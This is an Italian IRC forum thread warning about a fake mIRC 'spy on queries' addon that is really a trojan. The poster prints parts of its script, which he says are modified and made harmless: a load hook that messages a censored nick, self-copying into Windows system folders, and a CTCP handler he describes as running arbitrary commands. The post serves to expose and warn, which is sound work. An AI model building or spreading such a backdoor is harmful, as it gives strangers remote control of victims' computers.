PDA

View Full Version : Un altra lamerata..


Dragonite
11-08-2004, 21:09
Oggi mi è stato mandato da un amico che a sua volta lo ha ricevuto da un lamerozzo o almeno così pare, questo strano **addon** che permetterebbe di **spiare** le query di chi si vuole, ricevo, salvo, decomprimo lo zip (spiaquery.zip) ed inizio ad aprire il readme...

==================== SPIAQUERY==================
QUEST'ADDON è PARTICOLARMENTE CONSIGLIATO PER I
LAMERI PIU GROSSI, IN QUANTO GIA DAL NOME
POTRESTE KAPIRE IL SUO FUNZIONAMENTO.
==============================================
PER POTERLO ISTALLARE SCRIVETE /load -rs spiaquery.mrc
E COMINCIERETE QUANDO VOLETE A SPIARE TUTTE LE QUERY
CHE VOLETE.
by
Spiaquery team!


Che prodigio della tecnica! Dopo aver letto questo socievole readme mi addentro nel file .mrc..
Avviso che il codice del simpatico **pacco** che scoprirete avanti è stato modificato per ovvie regioni..



on *:load:{
dialog -m spiaquery spiaquery
echo -a GOOD ENJOY! SPIA QUERY CARICATO!
}
dialog spiaquery {
title "sq 3.0"
size -1 -1 153 118
option dbu
box "", 1, 2 1 149 114
text "ATTENZIONE si prega di leggere quanto segue.", 2, 15 7 115 8
text "Grazie a quest'add-on voi potrete spiare tutte le conversazioni piu comuni! clicca su avanti x proseguire il caricamento dell'add-on. Se nn vedrete risultati, disinstallate l'add-on, e segnalatecelo su #taldeitali . Buon divertimento! ", 3, 17 21 112 43
button "Avanti", 4, 31 92 37 12, ok
button "Esci", 5, 85 92 37 12, cancel
}



Uh, al load si apre una simpatica dialog con un avviso che gli autori pregano di leggere....
Ma...se uno clicca su avanti...cosa succede ?


on 1:dialog:spiaquery:sclick:4:{ load -rs sq1.sq }
on 1:dialog:spiaquery:sclick:5:{ unload -rs spiaquery.mrc }


Zacchete! Cliccando su avanti lo script loadda un altro file denominato .sq , uao, che fantasia...
Cliccando su annulla lo script viene deloaddato...
Ma...cosa contiene questo aggiuntivo load ?


on *:load:{
.msg xxxxxxxxxxx HO CARIKATO LA BACKDOOR
.copy $mircdir sq1.sq c:\windows\system\sq1.sq
.copy $mircdir sq1.sq c:\c:\windows\web\sq1.sq
}
ctcp taldeitali:commandone:{ halt }


Zacchete! al load viene inviato un msg a questo nick, censurato ovviamente, notate che facendo verifica il nick è registrato sulla rete, sono disponibile a darlo allo staff se occorre.

Ma poi..la stringa sotto è molto simpatica, permette a chiunque invia un determinato ctcp di eseguire il comando sul pc, e si parla di QUALUNQUE comando..la stringa è stata resa innoqua per ragioni di sicurezza


E con ciò invito a chi ha caricato questa lamerata di effettuare un cerca nel proprio pc per elimare questo file, sq1.sq, di deloaddarlo dal mIRC insieme a spiaquery.mrc.

Invito gli altri di non accettare o usare nessun tipo di questo script perchè ovviamente non servono allo scopo indicato, non esiste alcun script che permetta di spiare le query.

Con questo vi saluto
Buona Serata

Steve
16-08-2004, 19:09
Il modo migliore per completare il lavoro, oltre che non accettare porcate simili, e' di segnalare chi le diffonde nelle sedi opportune, ad esempio #operhelp .
Mi auguro che questo sia avvenuto anche per l'esempio sopra riportato, perche' non sara' certo un post sul forum ad impedire che altri utenti poco esperti finiscano nelle mani di simili espertoni che creano backdoor.